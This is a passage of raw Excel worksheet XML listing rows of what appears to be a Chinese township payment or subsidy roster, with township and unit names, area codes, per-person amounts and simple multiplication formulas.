    <row r="2431" ht="23" customHeight="1" spans="1:11">
      <c r="A2431" s="13" t="s">
        <v>6348</v>
      </c>
      <c r="B2431" s="14" t="s">
        <v>6335</v>
      </c>
      <c r="C2431" s="14" t="s">
        <v>5538</v>
      </c>
      <c r="D2431" s="14" t="s">
        <v>6349</v>
      </c>
      <c r="E2431" s="14" t="s">
        <v>6350</v>
      </c>
      <c r="F2431" s="14" t="s">
        <v>6338</v>
      </c>
      <c r="G2431" s="14">
        <v>1</v>
      </c>
      <c r="H2431" s="14">
        <v>340</v>
      </c>
      <c r="I2431" s="14">
        <f>H2431*G2431</f>
        <v>340</v>
      </c>
      <c r="J2431" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2431" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2432" ht="23" customHeight="1" spans="1:11">
      <c r="A2432" s="13" t="s">
        <v>6351</v>
      </c>
      <c r="B2432" s="14" t="s">
        <v>6335</v>
      </c>
      <c r="C2432" s="14" t="s">
        <v>5538</v>
      </c>
      <c r="D2432" s="14" t="s">
        <v>6352</v>
      </c>
      <c r="E2432" s="14" t="s">
        <v>6353</v>
      </c>
      <c r="F2432" s="14" t="s">
        <v>6338</v>
      </c>
      <c r="G2432" s="14">
        <v>1</v>
      </c>
      <c r="H2432" s="14">
        <v>340</v>
      </c>
      <c r="I2432" s="14">
        <f>H2432*G2432</f>
        <v>340</v>
      </c>
      <c r="J2432" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2432" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2433" ht="23" customHeight="1" spans="1:11">
      <c r="A2433" s="13" t="s">
        <v>6354</v>
      </c>
      <c r="B2433" s="14" t="s">
        <v>6335</v>
      </c>
      <c r="C2433" s="14" t="s">
        <v>6355</v>
      </c>
      <c r="D2433" s="14" t="s">
        <v>6356</v>
      </c>
      <c r="E2433" s="14" t="s">
        <v>1492</v>
      </c>
      <c r="F2433" s="14" t="s">
        <v>6338</v>
      </c>
      <c r="G2433" s="14">
        <v>1</v>
      </c>
      <c r="H2433" s="14">
        <v>340</v>
      </c>
      <c r="I2433" s="14">
        <f>H2433*G2433</f>
        <v>340</v>
      </c>
      <c r="J2433" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2433" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2434" ht="23" customHeight="1" spans="1:11">
      <c r="A2434" s="13" t="s">
        <v>6357</v>
      </c>
      <c r="B2434" s="14" t="s">
        <v>6335</v>
      </c>
      <c r="C2434" s="14" t="s">
        <v>6355</v>
      </c>
      <c r="D2434" s="14" t="s">
        <v>6358</v>
      </c>
      <c r="E2434" s="14" t="s">
        <v>6359</v>
      </c>
      <c r="F2434" s="14" t="s">
        <v>6338</v>
      </c>
      <c r="G2434" s="14">
        <v>2</v>
      </c>
      <c r="H2434" s="14">
        <v>300</v>
      </c>
      <c r="I2434" s="14">
        <f>H2434*G2434</f>
        <v>600</v>
      </c>
      <c r="J2434" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2434" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2435" ht="23" customHeight="1" spans="1:11">
      <c r="A2435" s="13" t="s">
        <v>6360</v>
      </c>
      <c r="B2435" s="14" t="str">
        <f>B2434</f>
        <v>石门乡</v>
      </c>
      <c r="C2435" s="14" t="str">
        <f>C2434</f>
        <v>粮食局</v>
      </c>
      <c r="D2435" s="71" t="s">
        <v>6361</v>
      </c>
      <c r="E2435" s="71" t="s">
        <v>6362</v>
      </c>
      <c r="F2435" s="14" t="str">
        <f>F2434</f>
        <v>4113210920</v>
      </c>
      <c r="G2435" s="14"/>
      <c r="H2435" s="14"/>
      <c r="I2435" s="14"/>
      <c r="J2435" s="14"/>
      <c r="K2435" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2436" ht="23" customHeight="1" spans="1:11">
      <c r="A2436" s="13" t="s">
        <v>6363</v>
      </c>
      <c r="B2436" s="14" t="s">
        <v>6335</v>
      </c>
      <c r="C2436" s="14" t="s">
        <v>5551</v>
      </c>
      <c r="D2436" s="14" t="s">
        <v>6364</v>
      </c>
      <c r="E2436" s="14" t="s">
        <v>6365</v>
      </c>
      <c r="F2436" s="14" t="s">
        <v>6338</v>
      </c>
      <c r="G2436" s="14">
        <v>1</v>
      </c>
      <c r="H2436" s="14">
        <v>340</v>
      </c>
      <c r="I2436" s="14">
        <f t="shared" ref="I2436:I2444" si="115">H2436*G2436</f>
        <v>340</v>
      </c>
      <c r="J2436" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2436" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2437" ht="23" customHeight="1" spans="1:11">
      <c r="A2437" s="13" t="s">
        <v>6366</v>
      </c>
      <c r="B2437" s="14" t="s">
        <v>6335</v>
      </c>
      <c r="C2437" s="14" t="s">
        <v>6335</v>
      </c>
      <c r="D2437" s="14" t="s">
        <v>6367</v>
      </c>
      <c r="E2437" s="14" t="s">
        <v>6368</v>
      </c>
      <c r="F2437" s="14" t="s">
        <v>6338</v>
      </c>
      <c r="G2437" s="14">
        <v>1</v>
      </c>
      <c r="H2437" s="14">
        <v>340</v>
      </c>
      <c r="I2437" s="14">
        <f t="shared" si="115"/>
        <v>340</v>
      </c>
      <c r="J2437" s="14" t="s">
        <v>6326</v>
      </c>
      <c r="K2437" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2438" ht="23" customHeight="1" spans="1:11">
      <c r="A2438" s="13" t="s">
        <v>6369</v>
      </c>
      <c r="B2438" s="14" t="s">
        <v>6335</v>
      </c>
      <c r="C2438" s="14" t="s">
        <v>5538</v>
      </c>
      <c r="D2438" s="14" t="s">
        <v>6370</v>
      </c>
      <c r="E2438" s="14" t="s">
        <v>6371</v>
      </c>
      <c r="F2438" s="14" t="s">
        <v>6338</v>
      </c>
      <c r="G2438" s="14">
        <v>1</v>
      </c>
      <c r="H2438" s="14">
        <v>340</v>
      </c>
      <c r="I2438" s="14">
        <f t="shared" si="115"/>
        <v>340</v>
      </c>
      <c r="J2438" s="14" t="s">
        <v>6326</v>
      </c>
      <c r="K2438" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2439" ht="23" customHeight="1" spans="1:11">
      <c r="A2439" s="13" t="s">
        <v>6372</v>
      </c>
      <c r="B2439" s="14" t="s">
        <v>6335</v>
      </c>
      <c r="C2439" s="14" t="s">
        <v>5551</v>
      </c>
      <c r="D2439" s="14" t="s">
        <v>6373</v>
      </c>
      <c r="E2439" s="14" t="s">
        <v>3175</v>
      </c>
      <c r="F2439" s="14" t="s">
        <v>6338</v>
      </c>
      <c r="G2439" s="14">
        <v>1</v>
      </c>
      <c r="H2439" s="14">
        <v>340</v>
      </c>
      <c r="I2439" s="14">
        <f t="shared" si="115"/>
        <v>340</v>
      </c>
      <c r="J2439" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2439" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2440" ht="23" customHeight="1" spans="1:11">
      <c r="A2440" s="13" t="s">
        <v>6374</v>
      </c>
      <c r="B2440" s="14" t="s">
        <v>6335</v>
      </c>
      <c r="C2440" s="76" t="s">
        <v>3539</v>
      </c>
      <c r="D2440" s="77" t="s">
        <v>6375</v>
      </c>
      <c r="E2440" s="26" t="s">
        <v>6376</v>
      </c>
      <c r="F2440" s="78" t="s">
        <v>6377</v>
      </c>
      <c r="G2440" s="14">
        <v>1</v>
      </c>
      <c r="H2440" s="14">
        <v>340</v>
      </c>
      <c r="I2440" s="14">
        <f t="shared" si="115"/>
        <v>340</v>
      </c>
      <c r="J2440" s="80" t="s">
        <v>3172</v>
      </c>
      <c r="K2440" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2441" ht="23" customHeight="1" spans="1:11">
      <c r="A2441" s="13" t="s">
        <v>6378</v>
      </c>
      <c r="B2441" s="14" t="s">
        <v>6335</v>
      </c>
      <c r="C2441" s="14" t="s">
        <v>6379</v>
      </c>
      <c r="D2441" s="14" t="s">
        <v>6380</v>
      </c>
      <c r="E2441" s="14" t="s">
        <v>6381</v>
      </c>
      <c r="F2441" s="14" t="s">
        <v>6338</v>
      </c>
      <c r="G2441" s="14">
        <v>2</v>
      </c>
      <c r="H2441" s="14">
        <v>300</v>
      </c>
      <c r="I2441" s="14">
        <f t="shared" si="115"/>
        <v>600</v>
      </c>
      <c r="J2441" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2441" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2442" ht="23" customHeight="1" spans="1:11">
      <c r="A2442" s="13" t="s">
        <v>6382</v>
      </c>
      <c r="B2442" s="14" t="str">
        <f>B2441</f>
        <v>石门乡</v>
      </c>
      <c r="C2442" s="14" t="str">
        <f>C2441</f>
        <v>电管所</v>
      </c>
      <c r="D2442" s="71" t="s">
        <v>6383</v>
      </c>
      <c r="E2442" s="71" t="s">
        <v>6384</v>
      </c>
      <c r="F2442" s="14" t="str">
        <f>F2441</f>
        <v>4113210920</v>
      </c>
      <c r="G2442" s="14"/>
      <c r="H2442" s="14"/>
      <c r="I2442" s="14"/>
      <c r="J2442" s="14"/>
      <c r="K2442" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2443" ht="23" customHeight="1" spans="1:11">
      <c r="A2443" s="13" t="s">
        <v>6385</v>
      </c>
      <c r="B2443" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2443" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2443" s="14" t="s">
        <v>6387</v>
      </c>
      <c r="E2443" s="14" t="s">
        <v>6388</v>
      </c>
      <c r="F2443" s="14" t="s">
        <v>6389</v>
      </c>
      <c r="G2443" s="14">
        <v>1</v>
      </c>
      <c r="H2443" s="14">
        <v>340</v>
      </c>
      <c r="I2443" s="14">
        <f>H2443*G2443</f>
        <v>340</v>
      </c>
      <c r="J2443" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2443" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2444" ht="23" customHeight="1" spans="1:11">
      <c r="A2444" s="13" t="s">
        <v>6390</v>
      </c>
      <c r="B2444" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2444" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2444" s="14" t="s">
        <v>6391</v>
      </c>
      <c r="E2444" s="14" t="s">
        <v>6392</v>
      </c>
      <c r="F2444" s="14" t="s">
        <v>6389</v>
      </c>
      <c r="G2444" s="14">
        <v>1</v>
      </c>
      <c r="H2444" s="14">
        <v>340</v>
      </c>
      <c r="I2444" s="14">
        <f>H2444*G2444</f>
        <v>340</v>
      </c>
      <c r="J2444" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2444" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2445" ht="23" customHeight="1" spans="1:11">
      <c r="A2445" s="13" t="s">
        <v>6393</v>
      </c>
      <c r="B2445" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2445" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2445" s="14" t="s">
        <v>6394</v>
      </c>
      <c r="E2445" s="14" t="s">
        <v>6395</v>
      </c>
      <c r="F2445" s="14" t="s">
        <v>6389</v>
      </c>
      <c r="G2445" s="14">
        <v>1</v>
      </c>
      <c r="H2445" s="14">
        <v>340</v>
      </c>
      <c r="I2445" s="14">
        <f>H2445*G2445</f>
        <v>340</v>
      </c>
      <c r="J2445" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2445" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2446" ht="23" customHeight="1" spans="1:11">
      <c r="A2446" s="13" t="s">
        <v>6396</v>
      </c>
      <c r="B2446" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2446" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2446" s="14" t="s">
        <v>6397</v>
      </c>
      <c r="E2446" s="14" t="s">
        <v>6398</v>
      </c>
      <c r="F2446" s="14" t="s">
        <v>6389</v>
      </c>
      <c r="G2446" s="14">
        <v>1</v>
      </c>
      <c r="H2446" s="14">
        <v>340</v>
      </c>
      <c r="I2446" s="14">
        <f>H2446*G2446</f>
        <v>340</v>
      </c>
      <c r="J2446" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2446" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2447" ht="23" customHeight="1" spans="1:11">
      <c r="A2447" s="13" t="s">
        <v>6399</v>
      </c>
      <c r="B2447" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2447" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2447" s="14" t="s">
        <v>6400</v>
      </c>
      <c r="E2447" s="14" t="s">
        <v>6401</v>
      </c>
      <c r="F2447" s="14" t="s">
        <v>6389</v>
      </c>
      <c r="G2447" s="14">
        <v>3</v>
      </c>
      <c r="H2447" s="14">
        <v>265</v>
      </c>
      <c r="I2447" s="14">
        <f>H2447*G2447</f>
        <v>795</v>
      </c>
      <c r="J2447" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2447" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2448" ht="23" customHeight="1" spans="1:11">
      <c r="A2448" s="13" t="s">
        <v>6402</v>
      </c>
      <c r="B2448" s="14" t="str">
        <f>B2447</f>
        <v>四棵树乡</v>
      </c>
      <c r="C2448" s="14" t="str">
        <f>C2447</f>
        <v>四棵树乡</v>
      </c>
      <c r="D2448" s="79" t="s">
        <v>6403</v>
      </c>
      <c r="E2448" s="79" t="s">
        <v>6404</v>
      </c>
      <c r="F2448" s="14" t="str">
        <f>F2447</f>
        <v>4113211125</v>
      </c>
      <c r="G2448" s="14"/>
      <c r="H2448" s="14"/>
      <c r="I2448" s="14"/>
      <c r="J2448" s="14"/>
      <c r="K2448" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2449" ht="23" customHeight="1" spans="1:11">
      <c r="A2449" s="13" t="s">
        <v>6405</v>
      </c>
      <c r="B2449" s="14" t="str">
        <f>B2448</f>
        <v>四棵树乡</v>
      </c>
      <c r="C2449" s="14" t="str">
        <f>C2448</f>
        <v>四棵树乡</v>
      </c>
      <c r="D2449" s="46" t="s">
        <v>6406</v>
      </c>
      <c r="E2449" s="46" t="s">
        <v>6407</v>
      </c>
      <c r="F2449" s="14" t="str">
        <f>F2448</f>
        <v>4113211125</v>
      </c>
      <c r="G2449" s="14"/>
      <c r="H2449" s="14"/>
      <c r="I2449" s="14"/>
      <c r="J2449" s="14"/>
      <c r="K2449" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2450" ht="23" customHeight="1" spans="1:11">
      <c r="A2450" s="13" t="s">
        <v>6408</v>
      </c>
      <c r="B2450" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2450" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2450" s="14" t="s">
        <v>6409</v>
      </c>
      <c r="E2450" s="14" t="s">
        <v>6410</v>
      </c>
      <c r="F2450" s="14" t="s">
        <v>6389</v>
      </c>
      <c r="G2450" s="14">
        <v>2</v>
      </c>
      <c r="H2450" s="14">
        <v>300</v>
      </c>
      <c r="I2450" s="14">
        <f>H2450*G2450</f>
        <v>600</v>
      </c>
      <c r="J2450" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2450" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2451" ht="23" customHeight="1" spans="1:11">
      <c r="A2451" s="13" t="s">
        <v>6411</v>
      </c>
      <c r="B2451" s="14" t="str">
        <f>B2450</f>
        <v>四棵树乡</v>
      </c>
      <c r="C2451" s="14" t="str">
        <f>C2450</f>
        <v>四棵树乡</v>
      </c>
      <c r="D2451" s="79" t="s">
        <v>2131</v>
      </c>
      <c r="E2451" s="79" t="s">
        <v>2780</v>
      </c>
      <c r="F2451" s="14" t="str">
        <f>F2450</f>
        <v>4113211125</v>
      </c>
      <c r="G2451" s="14"/>
      <c r="H2451" s="14"/>
      <c r="I2451" s="14"/>
      <c r="J2451" s="14"/>
      <c r="K2451" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2452" ht="23" customHeight="1" spans="1:11">
      <c r="A2452" s="13" t="s">
        <v>6412</v>
      </c>
      <c r="B2452" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2452" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2452" s="14" t="s">
        <v>6413</v>
      </c>
      <c r="E2452" s="14" t="s">
        <v>6414</v>
      </c>
      <c r="F2452" s="14" t="s">
        <v>6389</v>
      </c>
      <c r="G2452" s="14">
        <v>1</v>
      </c>
      <c r="H2452" s="14">
        <v>340</v>
      </c>
      <c r="I2452" s="14">
        <f>H2452*G2452</f>
        <v>340</v>
      </c>
      <c r="J2452" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2452" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2453" ht="23" customHeight="1" spans="1:11">
      <c r="A2453" s="13" t="s">
        <v>6415</v>
      </c>
      <c r="B2453" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2453" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2453" s="14" t="s">
        <v>6416</v>
      </c>
      <c r="E2453" s="14" t="s">
        <v>6417</v>
      </c>
      <c r="F2453" s="14" t="s">
        <v>6389</v>
      </c>
      <c r="G2453" s="14">
        <v>1</v>
      </c>
      <c r="H2453" s="14">
        <v>340</v>
      </c>
      <c r="I2453" s="14">
        <f>H2453*G2453</f>
        <v>340</v>
      </c>
      <c r="J2453" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2453" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2454" ht="23" customHeight="1" spans="1:11">
      <c r="A2454" s="13" t="s">
        <v>6418</v>
      </c>
      <c r="B2454" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2454" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2454" s="14" t="s">
        <v>6419</v>
      </c>
      <c r="E2454" s="14" t="s">
        <v>6420</v>
      </c>
      <c r="F2454" s="14" t="s">
        <v>6389</v>
      </c>
      <c r="G2454" s="14">
        <v>3</v>
      </c>
      <c r="H2454" s="14">
        <v>265</v>
      </c>
      <c r="I2454" s="14">
        <f>H2454*G2454</f>
        <v>795</v>
      </c>
      <c r="J2454" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2454" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2455" ht="23" customHeight="1" spans="1:11">
      <c r="A2455" s="13" t="s">
        <v>6421</v>
      </c>
      <c r="B2455" s="14" t="str">
        <f>B2454</f>
        <v>四棵树乡</v>
      </c>
      <c r="C2455" s="14" t="str">
        <f>C2454</f>
        <v>四棵树乡</v>
      </c>
      <c r="D2455" s="79" t="s">
        <v>6422</v>
      </c>
      <c r="E2455" s="79" t="s">
        <v>6423</v>
      </c>
      <c r="F2455" s="14" t="str">
        <f>F2454</f>
        <v>4113211125</v>
      </c>
      <c r="G2455" s="14"/>
      <c r="H2455" s="14"/>
      <c r="I2455" s="14"/>
      <c r="J2455" s="14"/>
      <c r="K2455" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2456" ht="23" customHeight="1" spans="1:11">
      <c r="A2456" s="13" t="s">
        <v>6424</v>
      </c>
      <c r="B2456" s="14" t="str">
        <f>B2455</f>
        <v>四棵树乡</v>
      </c>
      <c r="C2456" s="14" t="str">
        <f>C2455</f>
        <v>四棵树乡</v>
      </c>
      <c r="D2456" s="18" t="s">
        <v>6425</v>
      </c>
      <c r="E2456" s="19" t="s">
        <v>6426</v>
      </c>
      <c r="F2456" s="14" t="str">
        <f>F2455</f>
        <v>4113211125</v>
      </c>
      <c r="G2456" s="14"/>
      <c r="H2456" s="14"/>
      <c r="I2456" s="14"/>
      <c r="J2456" s="14"/>
      <c r="K2456" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2457" ht="23" customHeight="1" spans="1:11">
      <c r="A2457" s="13" t="s">
        <v>6427</v>
      </c>
      <c r="B2457" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2457" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2457" s="14" t="s">
        <v>6428</v>
      </c>
      <c r="E2457" s="14" t="s">
        <v>6429</v>
      </c>
      <c r="F2457" s="14" t="s">
        <v>6389</v>
      </c>
      <c r="G2457" s="14">
        <v>1</v>
      </c>
      <c r="H2457" s="14">
        <v>340</v>
      </c>
      <c r="I2457" s="14">
        <f>H2457*G2457</f>
        <v>340</v>
      </c>
      <c r="J2457" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2457" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2458" ht="23" customHeight="1" spans="1:11">
      <c r="A2458" s="13" t="s">
        <v>6430</v>
      </c>
      <c r="B2458" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2458" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2458" s="14" t="s">
        <v>6431</v>
      </c>
      <c r="E2458" s="14" t="s">
        <v>6388</v>
      </c>
      <c r="F2458" s="14" t="s">
        <v>6389</v>
      </c>
      <c r="G2458" s="14">
        <v>1</v>
      </c>
      <c r="H2458" s="14">
        <v>340</v>
      </c>
      <c r="I2458" s="14">
        <f>H2458*G2458</f>
        <v>340</v>
      </c>
      <c r="J2458" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2458" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2459" ht="23" customHeight="1" spans="1:11">
      <c r="A2459" s="13" t="s">
        <v>6432</v>
      </c>
      <c r="B2459" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2459" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2459" s="14" t="s">
        <v>6433</v>
      </c>
      <c r="E2459" s="14" t="s">
        <v>6434</v>
      </c>
      <c r="F2459" s="14" t="s">
        <v>6389</v>
      </c>
      <c r="G2459" s="14">
        <v>2</v>
      </c>
      <c r="H2459" s="14">
        <v>300</v>
      </c>
      <c r="I2459" s="14">
        <f>H2459*G2459</f>
        <v>600</v>
      </c>
      <c r="J2459" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2459" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2460" ht="23" customHeight="1" spans="1:11">
      <c r="A2460" s="13" t="s">
        <v>6435</v>
      </c>
      <c r="B2460" s="14" t="str">
        <f>B2459</f>
        <v>四棵树乡</v>
      </c>
      <c r="C2460" s="14" t="str">
        <f>C2459</f>
        <v>四棵树乡</v>
      </c>
      <c r="D2460" s="79" t="s">
        <v>6436</v>
      </c>
      <c r="E2460" s="79" t="s">
        <v>1676</v>
      </c>
      <c r="F2460" s="14" t="str">
        <f>F2459</f>
        <v>4113211125</v>
      </c>
      <c r="G2460" s="14"/>
      <c r="H2460" s="14"/>
      <c r="I2460" s="14"/>
      <c r="J2460" s="14"/>
      <c r="K2460" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2461" ht="23" customHeight="1" spans="1:11">
      <c r="A2461" s="13" t="s">
        <v>6437</v>
      </c>
      <c r="B2461" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2461" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2461" s="14" t="s">
        <v>6438</v>
      </c>
      <c r="E2461" s="14" t="s">
        <v>6439</v>
      </c>
      <c r="F2461" s="14" t="s">
        <v>6389</v>
      </c>
      <c r="G2461" s="14">
        <v>2</v>
      </c>
      <c r="H2461" s="14">
        <v>300</v>
      </c>
      <c r="I2461" s="14">
        <f>H2461*G2461</f>
        <v>600</v>
      </c>
      <c r="J2461" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2461" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2462" ht="23" customHeight="1" spans="1:11">
      <c r="A2462" s="13" t="s">
        <v>6440</v>
      </c>
      <c r="B2462" s="14" t="str">
        <f>B2461</f>
        <v>四棵树乡</v>
      </c>
      <c r="C2462" s="14" t="str">
        <f>C2461</f>
        <v>四棵树乡</v>
      </c>
      <c r="D2462" s="79" t="s">
        <v>6441</v>
      </c>
      <c r="E2462" s="79" t="s">
        <v>6442</v>
      </c>
      <c r="F2462" s="14" t="str">
        <f>F2461</f>
        <v>4113211125</v>
      </c>
      <c r="G2462" s="14"/>
      <c r="H2462" s="14"/>
      <c r="I2462" s="14"/>
      <c r="J2462" s="14"/>
      <c r="K2462" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2463" ht="23" customHeight="1" spans="1:11">
      <c r="A2463" s="13" t="s">
        <v>6443</v>
      </c>
      <c r="B2463" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2463" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2463" s="14" t="s">
        <v>6444</v>
      </c>
      <c r="E2463" s="14" t="s">
        <v>6445</v>
      </c>
      <c r="F2463" s="14" t="s">
        <v>6389</v>
      </c>
      <c r="G2463" s="14">
        <v>2</v>
      </c>
      <c r="H2463" s="14">
        <v>300</v>
      </c>
      <c r="I2463" s="14">
        <f>H2463*G2463</f>
        <v>600</v>
      </c>
      <c r="J2463" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2463" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2464" ht="23" customHeight="1" spans="1:11">
      <c r="A2464" s="13" t="s">
        <v>6446</v>
      </c>
      <c r="B2464" s="14" t="str">
        <f>B2463</f>
        <v>四棵树乡</v>
      </c>
      <c r="C2464" s="14" t="str">
        <f>C2463</f>
        <v>四棵树乡</v>
      </c>
      <c r="D2464" s="79" t="s">
        <v>6447</v>
      </c>
      <c r="E2464" s="79" t="s">
        <v>6448</v>
      </c>
      <c r="F2464" s="14" t="str">
        <f>F2463</f>
        <v>4113211125</v>
      </c>
      <c r="G2464" s="14"/>
      <c r="H2464" s="14"/>
      <c r="I2464" s="14"/>
      <c r="J2464" s="14"/>
      <c r="K2464" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2465" ht="23" customHeight="1" spans="1:11">
      <c r="A2465" s="13" t="s">
        <v>6449</v>
      </c>
      <c r="B2465" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2465" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2465" s="14" t="s">
        <v>6450</v>
      </c>
      <c r="E2465" s="14" t="s">
        <v>6451</v>
      </c>
      <c r="F2465" s="14" t="s">
        <v>6389</v>
      </c>
      <c r="G2465" s="14">
        <v>1</v>
      </c>
      <c r="H2465" s="14">
        <v>340</v>
      </c>
      <c r="I2465" s="14">
        <f>H2465*G2465</f>
        <v>340</v>
      </c>
      <c r="J2465" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2465" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2466" ht="23" customHeight="1" spans="1:11">
      <c r="A2466" s="13" t="s">
        <v>6452</v>
      </c>
      <c r="B2466" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2466" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2466" s="14" t="s">
        <v>6453</v>
      </c>
      <c r="E2466" s="14" t="s">
        <v>6439</v>
      </c>
      <c r="F2466" s="14" t="s">
        <v>6389</v>
      </c>
      <c r="G2466" s="14">
        <v>2</v>
      </c>
      <c r="H2466" s="14">
        <v>300</v>
      </c>
      <c r="I2466" s="14">
        <f>H2466*G2466</f>
        <v>600</v>
      </c>
      <c r="J2466" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2466" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2467" ht="23" customHeight="1" spans="1:11">
      <c r="A2467" s="13" t="s">
        <v>6454</v>
      </c>
      <c r="B2467" s="14" t="str">
        <f>B2466</f>
        <v>四棵树乡</v>
      </c>
      <c r="C2467" s="14" t="str">
        <f>C2466</f>
        <v>四棵树乡</v>
      </c>
      <c r="D2467" s="79" t="s">
        <v>6455</v>
      </c>
      <c r="E2467" s="79" t="s">
        <v>6456</v>
      </c>
      <c r="F2467" s="14" t="str">
        <f>F2466</f>
        <v>4113211125</v>
      </c>
      <c r="G2467" s="14"/>
      <c r="H2467" s="14"/>
      <c r="I2467" s="14"/>
      <c r="J2467" s="14"/>
      <c r="K2467" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2468" ht="23" customHeight="1" spans="1:11">
      <c r="A2468" s="13" t="s">
        <v>6457</v>
      </c>
      <c r="B2468" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="C2468" s="14" t="s">
        <v>6386</v>
      </c>
      <c r="D2468" s="14" t="s">
        <v>6458</v>
      </c>
      <c r="E2468" s="14" t="s">
        <v>6459</v>
      </c>
      <c r="F2468" s="14" t="s">
        <v>6389</v>
      </c>
      <c r="G2468" s="14">
        <v>2</v>
      </c>
      <c r="H2468" s="14">
        <v>300</v>
      </c>
      <c r="I2468" s="14">
        <f>H2468*G2468</f>
        <v>600</v>
      </c>
      <c r="J2468" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2468" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2469" ht="23" customHeight="1" spans="1:11">
      <c r="A2469" s="13" t="s">
        <v>6460</v>
      </c>
      <c r="B2469" s="14" t="str">
        <f>B2468</f>
        <v>四棵树乡</v>
      </c>
      <c r="C2469" s="14" t="str">
        <f>C2468</f>
        <v>四棵树乡</v>
      </c>
      <c r="D2469" s="79" t="s">
        <v>6461</v>
      </c>
      <c r="E2469" s="79" t="s">
        <v>6456</v>
      </c>
      <c r="F2469" s="14" t="str">
        <f>F2468</f>
        <v>4113211125</v>
      </c>
